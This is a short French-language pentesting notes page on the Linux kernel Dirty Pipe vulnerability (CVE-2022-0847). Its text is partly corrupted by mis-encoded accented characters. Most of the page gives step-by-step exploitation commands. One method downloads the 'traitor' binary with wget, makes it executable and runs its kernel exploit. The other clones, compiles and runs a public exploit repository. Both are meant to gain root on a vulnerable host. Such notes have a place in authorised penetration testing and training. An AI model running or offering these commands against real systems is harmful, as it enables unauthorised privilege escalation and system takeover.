CVE-2022-0847 (Dirty Pipe)

Dirty Pipe est une vulnรฉrabilitรฉ du noyau Linux depuis la version 5.8 qui permet d'รฉcraser des donnรฉes dans des fichiers arbitraires en lecture seule. Cela conduit ร  une รฉlรฉvation des privilรจges car les processus non privilรฉgiรฉs peuvent injecter du code dans les processus racine.

ressource: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Exploitation

Mรฉthode 1

# Tรฉlรฉchargement de l'executable ELF
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
# Don des droits nรฉcessaires ร  l'execution de l'executable
chmod 777 traitor-amd64
# Exploitation
./traitor-amd64 --exploit kernel:CVE-2022-0847

Mรฉthode 2:

# Tรฉlรฉchargement du script
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
cd CVE-2022-0847-DirtyPipe-Exploit
./compile.sh
# Exploitation
./exploit
PrรฉcรฉdentLinuxSuivantCVE 2021-4034 (PwnKit)

Derniรจre mise ร  jour